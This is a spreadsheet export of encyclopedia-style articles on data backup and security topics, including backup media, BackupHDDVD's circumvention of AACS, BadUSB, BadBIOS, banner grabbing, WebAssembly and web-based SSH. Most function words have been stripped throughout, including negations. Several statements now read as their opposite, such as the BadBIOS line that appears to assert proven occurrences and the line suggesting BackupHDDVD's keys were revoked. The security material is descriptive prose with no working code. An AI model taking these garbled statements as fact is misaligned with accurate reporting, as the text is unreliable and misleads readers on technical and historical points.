specifications. over period years stability hard disk backups shorter tape backups.external hard disks connected local interfaces like scsi, usb, firewire, esata, longer-distance technologies like ethernet, iscsi, fibre channel. some disk-based backup systems, virtual tape libraries otherwise, support data deduplication, reduce amount disk storage capacity consumed daily weekly backup data. optical storage optical storage uses lasers store retrieve data. recordable cds, dvds, blu-ray discs commonly used personal computers generally cheap. past, capacities speeds discs lower hard disks tapes, although advances optical media slowly shrinking gap.potential future data losses caused gradual media degradation predicted measuring rate correctable minor data errors, consecutively many increase risk uncorrectable sectors. support error scanning varies among optical drive vendors.many optical disc formats worm type, makes useful archival purposes since data cannot changed. moreover, optical discs vulnerable head crashes, magnetism, imminent water ingress power surges, fault drive typically halts spinning. optical media modular; storage controller tied media like hard drives flash storage (→flash memory controller), allowing removed accessed different drive. however, recordable media degrade earlier long-term exposure light.some optical storage systems allow cataloged data backups without human contact discs, allowing longer data integrity. french study 2008 indicated lifespan typically-sold cd-rs 2–10 years, manufacturer later estimated longevity cd-rs gold-sputtered layer high years. sony's proprietary optical disc archive 2016 reach read rate 250mb/s. solid-state drive solid-state drives (ssds) integrated circuit assemblies store data. flash memory, thumb drives, flash drives, compactflash, smartmedia, memory sticks, secure digital card devices relatively expensive capacity, convenient backing relatively data volumes. solid-state drive contain movable parts, making less susceptible physical damage, huge throughput around mbit/s gbit/s. available ssds become capacious cheaper. flash memory backups stable fewer years hard disk backups. remote backup service remote backup services cloud backups involve service providers storing data offsite. this used protect events fires, floods, earthquakes could destroy locally stored backups. cloud-based backup (through services like similar google drive, microsoft onedrive) provides layer data protection. however, users must trust provider maintain privacy integrity data, confidentiality enhanced encryption. because speed availability limited user's online connection, users large amounts data need cloud seeding large-scale recovery. management various methods used manage backup media, striking balance accessibility, security cost. these media management methods mutually exclusive frequently combined meet user's needs. using on-line disks staging data sent near-line tape library common example. online online backup storage typically accessible type data storage, begin restore milliseconds. internal hard disk disk array (maybe connected san) example online backup. this type storage convenient speedy, vulnerable deleted overwritten, either accident, malevolent action, wake data-deleting virus payload. near-line nearline storage typically less accessible less expensive online storage, still useful backup data storage. mechanical device usually used move media units storage drive data read written. generally safety properties similar on-line storage. example tape library restore times ranging seconds minutes. off-line off-line storage requires direct action provide access storage media: example, inserting tape tape drive plugging cable. because data accessible computer except limited periods written read back, largely immune on-line backup failure modes. access time varies depending whether media on-site off-site. off-site data protection backup media sent off-site vault protect disaster site-specific problem. vault simple system administrator's home office sophisticated disaster-hardened, temperature-controlled, high-security bunker facilities backup media storage. data replica off-site also on-line (e.g., off-site raid mirror). such replica fairly limited value backup. backup site backup site disaster recovery center used store data enable computer systems networks restored properly configure event disaster. some organisations data recovery centres, others contract third-party. high costs, backing rarely considered preferred method moving data site. typical would remote disk mirroring, keeps data date possible. selection extraction data backup operation starts selecting extracting coherent units data. most data modern computer systems stored discrete units, known files. these files organized filesystems. deciding back given time involves tradeoffs. backing much redundant data, information repository fill quickly. backing insufficient amount data eventually lead loss critical information. files copying files making copies files simplest common perform backup. means perform basic function included backup software operating systems. partial file copying: backup include blocks bytes within file changed given period time. this substantially reduce needed storage space, requires higher sophistication reconstruct files restore situation. some implementations require integration source file system. deleted files prevent unintentional restoration files intentionally deleted, record deletion must kept. versioning files most backup applications, full only/system imaging, also back files modified since last backup. "that way, retrieve many different versions given file, delete hard disk, still find [information repository] archive." filesystems filesystem dump: copy whole filesystem block-level made. this also known "raw partition backup" related disk imaging. process usually involves unmounting filesystem running program like (unix). because disk read sequentially large buffers, type backup faster reading every file normally, especially filesystem contains many small files, highly fragmented, nearly full. method also reads free disk blocks contain useful data, method also slower conventional reading, especially filesystem nearly empty. some filesystems, xfs, provide "dump" utility reads disk sequentially high performance skipping unused sections. corresponding restore utility selectively restore individual files entire volume operator's choice. identification changes: some filesystems archive file says recently changed. some backup software looks date file compares last backup determine whether file changed. versioning file system versioning filesystem tracks changes file. nilfs versioning filesystem linux example. live data files actively updated present challenge back back live data temporarily quiesce (e.g., close files), take "snapshot", resume live operations. point snapshot backed normal methods. snapshot instantaneous function filesystems presents copy filesystem frozen specific point time, often copy-on-write mechanism. snapshotting file changed results corrupted file unusable. this also case across interrelated files, found conventional database applications microsoft exchange server. term fuzzy backup used describe backup live data looks like correctly, represent state data single point time.backup options data files cannot quiesced include: open file backup: many backup software applications undertake back open files internally consistent state. some applications simply check whether open files later. other applications exclude open files updated frequently. some low-availability interactive applications backed natural/induced pausing. interrelated database files backup: some interrelated database file systems offer means generate "hot backup" database online usable. this include snapshot data files plus snapshotted changes made backup running. upon restore, changes files applied bring copy database point time initial backup ended. other low-availability interactive applications backed coordinated snapshots. however, genuinely-high-availability interactive applications backed continuous data protection. metadata information stored computer stored files. accurately recovering complete system scratch requires keeping track non-file data too. system description: system specifications needed procure exact replacement disaster. boot sector boot sector sometimes recreated easily saving usually normal file system boot without partition layout: layout original disk, well partition tables filesystem settings, needed properly recreate original system. file metadata each file's permissions, owner, group, acls, metadata need backed restore properly recreate original environment. system metadata: different operating systems different ways storing configuration information. microsoft windows keeps registry system information difficult restore typical file. manipulation data dataset optimization frequently useful required manipulate data backed optimize backup process. these manipulations improve backup speed, restore speed, data security, media usage and/or reduced bandwidth requirements. automated data grooming out-of-date data automatically deleted, personal backup applications—as opposed enterprise client-server backup applications automated data "grooming" customized—the deletion globally delayed disabled. compression various schemes employed shrink size source data stored uses less storage space. compression frequently built-in feature tape drive hardware. deduplication redundancy backing similarly configured workstations reduced, thus storing copy. this technique applied file block level. this potentially large reduction called deduplication. occur server data moves backup media, sometimes referred source/client side deduplication. this approach also reduces bandwidth required send backup data target media. process also occur target storage device, sometimes referred inline back-end deduplication. duplication sometimes backups duplicated second storage media. this done rearrange archive files optimize restore speed, second copy different location different storage medium—as disk-to-disk-to-tape capability enterprise client-server backup. encryption high-capacity removable storage media backup tapes present data security risk lost stolen. encrypting data media mitigate problem, however encryption intensive process slow backup speeds, security encrypted backups effective security management policy. multiplexing when many computers backed destination storage devices, ability single storage device several simultaneous backups useful. however cramming scheduled backup window "multiplexed backup" used tape destinations. refactoring process rearranging sets backups archive file known refactoring. example, backup system uses single tape store incremental backups protected computers, restoring computers could require many tapes. refactoring could used consolidate backups single computer onto single tape, creating "synthetic full backup". this especially useful backup systems incrementals forever style backups. staging sometimes backups copied staging disk copied tape. this process sometimes referred d2d2t, acronym disk-to-disk-to-tape. useful problem matching speed final destination device source device, frequently faced network-based backup systems. also serve centralized location applying data manipulation techniques. objectives recovery point objective (rpo) point time restarted infrastructure reflect, expressed "the maximum targeted period data (transactions) might lost service major incident". essentially, roll-back experienced result recovery. desirable would point prior data loss event. making recent recovery point achievable requires increasing frequency synchronization source data backup repository. recovery time objective (rto) amount time elapsed disaster restoration business functions. data security addition preserving access data owners, data must restricted unauthorized access. backups must performed manner compromise original owner's undertaking. this achieved data encryption proper media handling policies. data retention period regulations policy lead situations backups expected retained particular period, further. retaining backups period lead unwanted liability sub-optimal storage media. checksum hash function validation applications back tape archive files need option verify data accurately copied. backup process monitoring enterprise client-server backup applications need user interface allows administrators monitor backup process, proves compliance regulatory bodies outside organization; example, insurance company might required hipaa demonstrate client data meet records retention requirements. user-initiated backups restores avoid recover minor disasters, inadvertently deleting overwriting "good" versions files, computer user—rather administrator—may initiate backups restores (from necessarily most-recent backup) files folders. also about backupbackup software services list backup software list online backup services glossary backup terms virtual backup appliancerelated topicsdata consistency data degradation data portability data proliferation database dump digital preservation disaster recovery business continuity auditing notes references external links dictionary definition backup wiktionary media related backup wikimedia commons</t>
  </si>
  <si>
    <t>BackupHDDVD</t>
  </si>
  <si>
    <t>backuphddvd small computer software utility program available command line versions aids decryption commercial discs protected advanced access content system. used back discs, often enable playback hardware configurations without full support hdcp. program's source code posted online, licence information given. written anonymous programmer using handle muslix64, backuphddvd distributed none cryptographic keys necessary decryption. users wanting software decrypt protected disc's contents must obtain appropriate keys separately, task neither original author versions backuphddvd assist.backuphddvd represented first known successful attack aacs. utility circumvents content protection decrypting video files directly aes, underling cryptographic cipher used aacs. using technique, backuphddvd able completely bypass aacs chain trust, rendering immune revocation. cost immunity users forced rely keys leaking commercial player software backuphddvd discs. history according creator backuphddvd, first circumvent aacs bypass restriction software players reduced quality aacs restricted 1080p high definition video standard definition video refused play outright unless hdcp compliant chain video hardware present. time computer monitors video cards supported hdcp. result, configurations would allowed high-definition viewing software players exceptionally rare.on december 2006, video showed backuphddvd used decrypt copy film full metal jacket hard drive uploaded youtube. days video uploaded, initial version utility along source code documentation uploaded file hosting service. link file posted utility's creator forums doom9, website devoted backup. utility's documentation, along forum post, contained little information necessary keys could obtained. author elaborated another forum post, claiming keys could obtained exploiting necessity held memory allow playback player software. january 2007, author posted version backuphddvd utility, included support decoding discs using volume keys. several weeks following utility's release success using author's extraction technique reported. mid-january 2007, volume published another member doom9 forum along explanation technique used obtain other forum members quickly discovered keys different titles. keys many discs readily available internet. further development backuphddvd hosted sourceforge site received dmca takedown notice alleging violation late february. compliance notice, project immediately removed. several versions backuphddvd released individuals original author, including versions guis ability locate keys internet scan memory automatically. hddecrypter, port backuphddvd native windows also available. this version supports multiple threads runs faster java counterparts. while development backuphddvd ceased, commercial decryption utility called slysoft anydvd exists relies compromised aacs processing media keys allow backup unrestricted viewing aacs-protected discs without need title volume keys. background aacs licensing authority (la) assigns series unique cryptographic keys device manufacturers. when aacs protected disc manufactured, series keys called title keys generated video content disc encrypted using keys. title keys stored disc encrypted another called volume unique key. volume unique disc calculated authorized devices using another called processing key, derived media block stored disc. authorized devices manufacturer's assigned device keys decrypt media block, yielding processing enabling decryption volume title keys, finally content.if device revoked, media blocks discs manufactured time revocation encrypted enable revoked device obtain valid processing key. users trying view content revoked player would forced upgrade player software secure version, thereby limiting scope compromise time exploit discovered. while compromised device processing could used decrypt large number discs, backuphddvd keys revoked aacs because aacs revocation system works preventing given device player calculating valid volume unique key, backuphddvd circumvents system entirely relying volume title keys leaked authorized players. with keys backuphddvd subject device revocation able decrypt content directly, bypassing exchange verification process. features limitations users must either found decryption keys obtained elsewhere versions backuphddvd work. utility reads text file containing volume title keys attempts find corresponding keys inserted disc. through standard library, decrypts video file disc using appropriate keys writes results location specified user. direct file decryption allows utility's functionality remain unaffected device revocation performance unencumbered aacs overhead.originally intended proof concept, backuphddvd severely limited ability produce fully functional copies commercial discs. early versions unable properly decrypt discs used in-movie experience technology. versions work around limitation excluding interactive content decrypted copies. utility cannot process navigation functionality enables menus, chapters, secondary audio tracks subtitles, features inaccessible copies created backuphddvd. most versions provide validation keys still attempt decrypt disc's contents incorrect key, resulting corrupt files. legality under united states anti-circumvention created digital millennium copyright act, backuphddvd qualify device primarily intended "circumvent technological measure effectively controls access [protected] work." identified such, would illegal distribute. reaction reaction utility doom9 forum members, bloggers, mainstream media ranged supportive intensely hostile. some, circumvention aacs seen reaffirmation fair use. others felt utility piracy tool would bring group punishment consumers form player revocation. article compared proponents backuphddvd terrorists. when release tool first publicized, several articles claimed aacs cracked. fact cryptographic weaknesses constituting crack found aes, underlying cryptographic system aacs. keys actually obtained side-channel attack.initially, thought compromise dvd's security would entice studios adopting competing blu-ray format, blu-ray's aacs implementation since circumvented using similar method. however, blu-ray offers additional layer protection called bd+. there speculation player used utility's author obtain keys would revoked. cyberlink, sells powerdvd player software, quick deny software could used obtain keys. corel silent role windvd software played leaking volume title keys. both companies since released updates player software.the consortium behind format studios delivering films format release official statement beyond investigating utility. january 2007 aacs issued statement acknowledging aacs security compromised urging software vendors limit availability keys memory. beginning discs manufactured late april, versions powerdvd windvd responsible leaking keys revoked free updates available owners affected versions. notes external links original post doom9</t>
  </si>
  <si>
    <t>BackupPC</t>
  </si>
  <si>
    <t>backuppc free disk-to-disk backup software suite web-based frontend. cross-platform server linux, solaris, unix-based server. client necessary, server client several protocols handled services native client 2007, backuppc mentioned three well known open-source backup software, even though tools amazing, unfortunately, ever talks them, many folks never hear them".data deduplication reduces disk space needed store backups disk pool. possible d2d2t solution, archive function backuppc used back disk pool tape. backuppc block-level backup system like ghost4linux performs file-based backup restore. thus suitable backup disk images disk partitions.backuppc incorporates server message block (smb) client used back network shares computers running windows. paradoxically, setup backuppc server located behind nat'd firewall windows machine operates public address. while advisable traffic, useful servers running secure shell (ssh) rsync available, allows backuppc server stored subnet separate server's dmz. published general public license. protocols supported backuppc supports nfs, ssh, rsync.it back unix-like systems native rsync support, linux, bsd, well microsoft windows shares minimal configuration.on windows, third party implementations tar, rsync, (such cygwin) required utilize protocols. protocol choice choice rsync dictated hardware bandwidth available client. clients backed rsync considerably time client machines using smb. clients using considerably bandwidth clients using rsync. these trade-offs inherent differences protocols. using transfers file entirety, using little maximum bandwidth. rsync method calculates checksums file client server machines enables transfer differences files; uses resources, minimizes bandwidth. data storage version backuppc uses combination hard links compression reduce total disk space used files. first full backup, files transferred backend, optionally compressed, compared. files identical hard linked, uses additional directory entry. upshot astute system administrator could potentially back windows laptops data each, repeated machine (office windows binary files) would look like needed, would used. compression data back-end reduce requirement. when browsing backups, incremental backups automatically filled back previous full backup. every backup appears full complete data. version version still v3.x repositories, backups format (seamless upgrade). overall performance higher v3.x version. also list backup software comparison backup software references external links official website</t>
  </si>
  <si>
    <t>Bacula</t>
  </si>
  <si>
    <t>bacula open-source, enterprise-level computer backup system heterogeneous networks. designed automate backup tasks often required intervention systems administrator computer operator. bacula supports linux, unix, windows, macos backup clients, range professional backup devices including tape libraries. administrators operators configure system command line console, interface; back-end catalog information stored mysql, postgresql, sqlite. overview bacula computer programs managing backup, recovery, verification computer data across network—providing backup solution mixed operating system environments. bacula open-source released agpl version license exceptions permit linking openssl distributing windows binaries.bacula available "dual license" (see multi-licensing) agplv3 proprietary license. several entities offer commercial support agpl "bacula community version" bacula systems sells various levels annual support contracts "bacula enterprise edition", contains various non-gpl components developed in-house. 2015, bacula systems named "top most promising data center solution providers" review.in common dual-license software, components developed bacula enterprise edition released bacula community edition period exclusivity proprietary version. since april 2002, bacula million downloads, makes downloaded open-source backup program. features bacula's features include: network options tcp/ip client–server communication uses standard ports services instead nfs, smb, etc.; eases firewall administration network security cram-md5 configurable client–server authentication gzip/lzo client-side compression reduce network bandwidth consumption; runs separate hardware compression done backup device network communication encryption md5/sha verify file integrity verify data block integrity backup data encryption ndmp enterprise version plugin cloud backup file storage services client client software, executed "file daemon" running bacula client, supports multiple operating systems. considerations default, bacula's differential incremental backups based system time stamps. consequently, move files existing directory move whole directory backup fileset full backup, files backed incremental save dates. must explicitly update date/time stamp moved files. bacula versions starting later support accurate backup, option addresses issue without requiring modification files timestamps. this feature always used accurate state filesystem important. which criteria applied configurable, i.e. inode comparisons, modification times md5/sha1 signatures. history forks bacula 2011, graham keeling, "former" bacula community developer, released friendly fork bacula.in february 2013 former bacula community developer (with several free software users) released bareos fork bacula. also amanda proxmox backup server references external links official website bacula systems' home page</t>
  </si>
  <si>
    <t>Bad sector</t>
  </si>
  <si>
    <t>sector computing disk sector disk storage unit permanently damaged. upon taking damage, information stored sector lost. when sector found marked, operating system like windows linux skip future. details sector result mechanical damage, commonly caused head crash, manufacturing flaw(s), wear-and-tear, physical shock, sudden power outages, dust intrusion. sectors threat information security sense data remanence. very often physical damages interfere parts many different files. operating system sectors detected operating system disk controller. most file systems contain provisions sectors marked bad, operating system avoids future. disk diagnostic utilities, chkdsk (microsoft windows), disk utility macos), badblocks linux) actively look sectors upon user request. disk controller when sector found unstable firmware disk controller, disk controller remaps logical sector different physical sector. typically, automatic remapping sectors happens sector written normal operation hard drive, detection remapping sectors take place manner transparent rest system advance data lost. there types remapping disk hardware: p-list (mapping factory production tests) g-list (mapping consumer usage disk microcode). utilities read self-monitoring, analysis, reporting technology (smart) information tell many sectors reallocated, many spare sectors drive still have. because reads writes g-list sectors automatically redirected (remapped) spare sectors, slows drive access even data drive defragmented. once g-list filled storage unit must replaced. also spiradisc copy protection scheme writing sectors spiraling paths disk rather concentric circles. sector slipping method avoiding sectors arccos protection sector protection dvds, used sony. head crash serious form damage hard disk platter references external links blocks definition</t>
  </si>
  <si>
    <t>BadBIOS</t>
  </si>
  <si>
    <t>badbios alleged malware described network security researcher dragos ruiu october 2013 ability communicate instances across gaps using ultrasonic communication computer's speakers microphone. date, proven occurrences malware. ruiu says malware able infect bios computers running windows, linux well spread infection flash drives. graham errata security produced detailed analysis element descriptions badbios's capabilities, describing software "plausible", whereas paul ducklin sophos naked security blog suggested "it's possible, course, elaborate hoax". after ruiu posted data dumps supposedly demonstrated existence virus, "all signs maliciousness found normal expected data".in december 2013 computer scientists michael hanspach michael goetz released paper journal communication demonstrating possibility acoustic mesh networking slow bits second using speakers microphones ultrasonic communication fashion similar badbios's described abilities. also (networking) phreaking references</t>
  </si>
  <si>
    <t>BadUSB</t>
  </si>
  <si>
    <t>badusb computer security attack using devices programmed malicious software. example, flash drives contain programmable intel 8051 microcontroller, reprogrammed, turning flash drive malicious device.the badusb attack first revealed black talk 2014 karsten nohl, sascha krißler jakob lell. months talk, researchers published code used exploit vulnerability. 2017, version dongle, acts like hardware firewall, released, designed prevent badusb style attacks.karsten nohl stated: "it's struggle simplicity security. power plug works. this simplicity exactly what's enabling attacks."author catalin cimpanu zdnet noted badusb attack "incredibly rare". though, 2020, attack found wild hospitality provider attacked using fake gift card. attack downloaded malware powershell command typed programmed keystrokes flash drive. references</t>
  </si>
  <si>
    <t>Balloon hashing</t>
  </si>
  <si>
    <t>balloon hashing derivation function presenting proven memory-hard password-hashing modern design. created boneh, henry corrigan-gibbs (both stanford university) stuart schechter (microsoft research) 2016. recommended function nist password guidelines.the authors claim balloon: proven memory-hardness properties, built standard primitives: standards non-space-hard cryptographic hash function sub-algorithm (e.g., sha-3, sha-512), resistant side-channel attacks: memory access pattern independent data hashed, easy implement matches performance similar algorithms.balloon compared authors argon2, similarly performing algorithm. algorithm there three steps algorithm: expansion, initial buffer filled pseudorandom byte sequence derived password salt repeatedly hashed. mixing, bytes buffer mixed time_cost number times. output, portion buffer taken hashing result. references external links research prototype code github python implementation rust implementation alwen; blocki. "efficiently computing data-independent memory-hard functions". eprint. 2016 (115). alwen; blocki. "towards practical attacks argon2i balloon hashing". eprint. 2016 (759).</t>
  </si>
  <si>
    <t>Banner grabbing</t>
  </si>
  <si>
    <t>banner grabbing technique used gain information computer system network services running open ports. administrators take inventory systems services network. however, intruder banner grabbing order find network hosts running versions applications operating systems known exploits. some examples service ports used banner grabbing used hyper text transfer protocol (http), file transfer protocol (ftp), simple mail transfer protocol (smtp); ports respectively. tools commonly used perform banner grabbing telnet, nmap netcat. example, could establish connection target server using netcat, send http request. response typically contain information service running host: this information used administrator catalog system, intruder narrow list applicable exploits. prevent this, network administrators restrict access services networks shut unused unnecessary services running network hosts. shodan search engine banners grabbed port scanning internet. references mcclure, stuart hacking exposed. york: mcgraw-hill/osborne, 2005.</t>
  </si>
  <si>
    <t>WebScarab</t>
  </si>
  <si>
    <t>webscarab security application testing tool. serves proxy intercepts allows people alter browser requests (both http https) server replies. webscarab also record traffic review.webscarab open source tool developed open application security project (owasp), implemented java could across multiple operating systems. 2013 official development webscarab slowed, appears owasp's attack proxy ("zap") project (another java-based, open source proxy tool features active development) webscarab's official successor, although forked paros proxy, webscarab. references external links current version next version (functional, still development) easy website builder</t>
  </si>
  <si>
    <t>Bar mitzvah attack</t>
  </si>
  <si>
    <t>mitzvah attack attack ssl/tls protocols exploits cipher weak keys cipher. while affects first hundred bytes small fraction connections happen weak keys, allows significant compromise user security, example allowing interception password information could used long-term exploitation. attack uses vulnerability described invariance weakness fluhrer 2001 paper weaknesses, also known attack.the attack named mitzvah ceremony held years age, vulnerability exploited years likely inspired naming unrelated birthday attack. also fluhrer, mantin shamir attack references external links "attacking using rc4: breaking 13-year-old weakness" (pdf). imperva. 2015. retrieved march 2015. "bar mitzvah attack breaking 13-year weakness (slides)" (pdf). black asia. 2015. retrieved october 2020. "bar mitzvah attack breaking 13-year weakness (whitepaper)" (pdf). black asia. 2015. retrieved october 2020.</t>
  </si>
  <si>
    <t>Bare-metal restore</t>
  </si>
  <si>
    <t>bare-metal restore technique field data recovery restoration backed data available form allows restore computer system "bare metal", i.e. without requirements previously installed software operating system. typically, backed data includes necessary operating system, applications data components rebuild restore backed system entirely separate piece hardware. configurations, hardware receiving restore needs identical configuration hardware source backup, although virtualization techniques careful planning enable bare-metal restore hardware configuration different original. disk imaging applications enable bare-metal restores storing copies (images) entire contents hard disks networked external storage, writing images physical disks. disk image application include entire operating system, bootable live network file server, contains required application code create restore disk images. examples software used bare-metal recovery utility linux boot used copy file systems disk images disk partitions effect bare-metal backup recovery. these disk images used input partition type equal larger size, alternatively variety virtualization technologies often represent accessible less efficient representation data original partition. vm/370 operating system provides command name "ddr," disk dump restore. backup hard drive specified media, typically tape, many choices exist. microsoft introduced backup utility (wbadmin) windows server 2008 family operating system 2008 built-in support bare-metal recovery. users software also recover system hyper-v virtual machine.microsoft updated windows recovery environment features windows family operating system provide built-in support bare-metal recovery.microsoft windows server 2012 (r2) offers built-in bare-metal-recovery. comparison data backup restoration techniques bare-metal restore differs local disk image restore copy disk image, restoration software, stored computer backed bare-metal restore differs simple data backups application data, neither applications operating system backed restored unit. also comparison disk cloning software references</t>
  </si>
  <si>
    <t>WebAssembly</t>
  </si>
  <si>
    <t>webassembly (sometimes abbreviated wasm) defines portable binary-code format corresponding text format executable programs well software interfaces facilitating interactions programs host environment.the main goal webassembly enable high-performance applications pages, "but make web-specific assumptions provide web-specific features, employed environments well." open standard aims support language operating system, practice popular languages already least level support. announced 2015 (2015) first released march 2017 (2017-03), webassembly became world wide consortium recommendation december 2019 received programming languages software award sigplan 2021. world wide consortium (w3c) maintains standard contributions mozilla, microsoft, google, apple, fastly, intel, hat. history webassembly first announced 2015, first demonstration executing unity's angry bots firefox, google chrome, microsoft edge. precursor technologies asm.js mozilla google native client, initial implementation based feature asm.js. asm.js technology already provides near-native code execution speeds considered viable alternative browsers support webassembly disabled security reasons. march 2017, design minimum viable product (mvp) declared finished preview phase ended. late september 2017, safari released support. february 2018, webassembly working group published three public working drafts core specification, javascript interface, api.in june 2019, chrome released webassembly threads enabled default. implementations while webassembly initially designed enable near-native code execution speed browser, considered valuable outside such, generalized contexts. since webassembly's runtime environments (re) level virtual stack machines (akin flash embedded host applications, found standalone runtime environments like wasmtime wasmer. browsers november 2017, mozilla declared support major browsers", webassembly enabled default edge support includes mobile browsers android. august 2022, installed browsers support webassembly. older browsers, wasm compiled asm.js javascript polyfill. compilers webassembly implementations usually either ahead-of-time (aot) just-in-time (jit) compilation, also interpreter. while first implementations landed browsers, also non-browser implementations general-purpose use, including wasmer, wasmtime wamr, wasm3, wavm, many others.because webassembly executables precompiled, possible variety programming languages make them. this achieved either direct compilation wasm, implementation corresponding virtual machines wasm. there around programming languages reported support wasm compilation target.emscripten compiles wasm using binaryen llvm backend. emscripten compile llvm-supported languages (such rust, among others) source code binary file runs sandbox javascript code. emscripten provides bindings several commonly used environment interfaces like webgl. version standalone clang compile wasm.its initial support compilation c++, though support source languages rust, .net languages assemblyscript (typescript-like) also emerging. after release, plans support multithreading garbage collection would make webassembly compilation target garbage-collected programming languages like (supported blazor), (supported bolero help blazor), python, even javascript browser's just-in-time compilation speed considered slow. number languages support including python, java, julia, ruby. limitations general, webassembly allow direct interaction dom. interaction must flow javascript interop. absence garbage collection (although plans address this.) security considerations (discussed below)webassembly supported desktops, mobile, latter, practice (for non-small memory allocations, unity game engine) "grave limitations make many applications infeasible reliably deployed mobile browsers [..] currently allocating ~300mb memory reliable chrome android without resorting chrome-specific workarounds, safari ios."there direct document object model (dom) access; however, possible create proxy functions this, example stdweb web_sys using rust language. major browsers allow webassembly content-security-policy specified, "unsafe-eval" used, otherwise major browsers behave differently. practice webassembly can't used chrome without "unsafe-eval", worker thread workaround available. security considerations june 2018, security researcher presented possibility using webassembly circumvent browser mitigations spectre meltdown security vulnerabilities support threads shared memory added. concern, webassembly developers feature hold. however, order explore future language extensions, google chrome added experimental support webassembly thread proposal october 2018.webassembly criticized allowing greater ease hiding evidence malware writers, scammers phishing attackers; webassembly present user's machine compiled form, "[makes malware] detection difficult". speed concealability webassembly hidden crypto mining website visitor's device. coinhive, defunct service facilitating cryptocurrency mining website visitors' browsers, claims "miner uses webassembly runs performance native miner." june 2019 study technische universität braunschweig analyzed usage webassembly alexa million websites found prevalent malicious crypto mining, malware accounted half webassembly-using websites studied. april 2021 study universität stuttgart found since crypto mining marginalized, falling webassembly modules gathered wide range sources, also including alexa million websites.the ability effectively obfuscate large amounts code also used disable blocking privacy tools prevent tracking like privacy badger. webassembly supports structured control flow, amenable toward security verification techniques including symbolic execution. current efforts direction include manticore symbolic execution engine. wasi webassembly system interface (wasi) simple interface (abi api) designed mozilla intended portable platform. provides posix-like features like file constrained capability-based security. there also proposed abi/apis.wasi influenced cloudabi capsicum. solomon hykes, co-founder docker, wrote 2019, wasm+wasi existed 2008, needed create docker. that's important webassembly server future computing." wasmer, version 1.0, provides "software containerization, create universal binaries work anywhere without modification, including operating systems like linux, macos, windows, browsers. wasm automatically sandboxes applications default secure execution". specification host environment general standard provides core specifications javascript details embedding. virtual machine wasm code (binary code, i.e. bytecode) intended portable virtual stack machine (vm). designed faster parse execute javascript compact code representation. external functionality (like syscalls) expected wasm binary code stipulated standard. rather provides deliver interfacing modules host environment implementation runs wasm program wasm program designed separate module containing collections various wasm-defined values program type definitions. these expressed either binary textual format (see below) common structure. instruction core standard binary format wasm program defines instruction architecture (isa) consisting specific binary encodings types operations executed (without specifying exactly must executed). list instructions includes standard memory load/store instructions, numeric, parametric, control flow instruction types wasm-specific variable instructions.the number opcodes used original standard (mvp) fewer possible opcodes. subsequent versions webassembly pushed number opcodes 200. webassembly simd proposal (for parallel processing) introduces alternate opcode prefix (0xfd) 128-bit simd. concatenation simd prefix, plus opcode valid simd prefix, forms simd opcode. simd opcodes bring additional instructions "minimum viable product" (mvp) simd capability (for total around instructions). those instructions, "finalized opcodes" implemented google's google chrome) corresponding engine mozilla firefox (but enabled stable versions browsers), also additional proposal instructions later "post simd mvp", there's also separate "relaxed-simd" proposal table.these simd opcodes also portable translate native instruction sets like arm. contrast, neither java's (nor cil) support simd, opcode level, i.e. standard; parallel apis provide simd speedup. there extension java adding intrinsics simd, portable, i.e. usable smartphones. smartphones support simd calling assembly code simd, similar support. code representation march 2017, webassembly community group reached consensus initial (mvp) binary format, javascript api, reference interpreter. defines webassembly binary format (.wasm), designed used humans, well human-readable webassembly text format (.wat) resembles cross s-expressions traditional assembly languages. table shows example factorial function written corresponding webassembly code compilation, shown .wat text format human-readable textual representation webassembly) .wasm binary format (the bytecode, expressed hexadecimal), executed browser run-time environment supports webassembly. integer constants encoded using space-efficient, variable-length leb128 encoding.the webassembly text format canonically written folded format using s-expressions. instructions expressions, format purely syntactic sugar behavioral differences linear format. through wasm2wat, code decompiles note module implicitly generated compiler. function actually referenced entry type table binary, hence type section type emitted decompiler. compiler decompiler accessed online. notes also architecture neutral distribution format (andf) uncol java bytecode common language runtime llvm compilation software portability references this article incorporates text free content work. licensed apache license license statement/permission. text taken text format, jfbastien; rossberg-chromium; kripken; titzer; s3ththompson; sunfishcode; lukewagner; flagxor; enricobacis; c3d; binji; andrewosh, github. webassembly/design. learn open license text wikipedia articles, please how-to page. information reusing text wikipedia, please terms use. external links official website community group webassembly design "webassembly", docs info browser compatibility specifications (webassembly javascript api)</t>
  </si>
  <si>
    <t>Web-based SSH</t>
  </si>
  <si>
    <t>web-based makes possible access secure shell (ssh) servers standard browsers. respective clients typically based javascript/ajax javascript/websockets, and, work together ajax/websocket-to-ssh proxy, used access servers behind firewall proxy allows http traffic allow traffic. technology web-based clients basically consist following parts: client-side: typically javascript dynamic html pages used capture keystrokes, transmit messages to/from server display results user's browser. server-side/web application: incoming requests processed application server. keyboard events forwarded secure shell client communicating connected server. terminal output either passed client converted html javascript translated html server transmitted client. client-side terminal emulation web-based servers utilize client-side terminal emulation typically transmit terminal output server directly client. this advantage offloading process translating terminal output html client. disadvantage method limited capabilities javascript non-trivial amount client's memory process incoming character stream. also relies client keep track terminal state respond escape sequences. client-side terminal emulator example: vt100.js server-side terminal emulation web-based servers utilize server-side terminal emulation typically keep track terminal screen state memory convert html either screen update occurs client expressly requests update. advantage method state terminal remains persistent even user connects existing session(s) different browser. also enables server upon terminal output even user disconnected. disadvantage method uses memory server. server-side terminal emulator example: terminal.py advantages main advantages web-based summarized follows: accessibility: web-based described article requires local installation client software. thus possible access servers browser anywhere. communication based http https also possible access servers behind firewall proxy restricts internet access ports (http) (https). anonymous access: access tunneled intermediary application server server actually communicates server. this means server aware address application server, keeping actual client's address hidden. auditability: because communication client server must pass application server communication logged. this prevents malicious client deleting logs activities. situation exactly traditional server. resuming sessions: some web-based implementations allow user resume sessions disconnected. this possible traditional client. embeddable: web-based implementations embedded page allowing integrated web-based applications. unique features: many web-based tools unique features ability share terminals users, display images within terminals, useful capabilities. important issues following issues considered important using web-based client: security: important make sure https used communicating application server. otherwise data sent would readable simple packet sniffers could reveal sensitive information. trust: data sent application server decrypted there. this necessary order forward issued commands actual server. even though operators web-based solutions usually sensitive data data theoretically available plain form. unlikely cause security issue application server server server controlled entity. tunneling: unlike traditional, application based clients, web-based clients unable tunnel ("forward") traffic. example, running session web-based session possible. however, lack ability caused implementation issues, inherent way. free open source examples google's secure shell extension chrome chromium pairs javascript hterm terminal emulator openssh client code running native client. secure shell extension works non-google http-to-ssh proxies proxy hooks, third-party application nassh-relay hooks enable secure shell extension establish connection xmlhttprequest websocket transport. shellinabox operates stand-alone service conjunction nginx provide https access login shell, packaged debian redhat -derived linux distributions. webssh similar solution written python. bastillion self hosted, web-based bastion host auditing management capabilities. users connect centralized server https connections proxied secure websocket transport. firessh browser plug-in works firefox 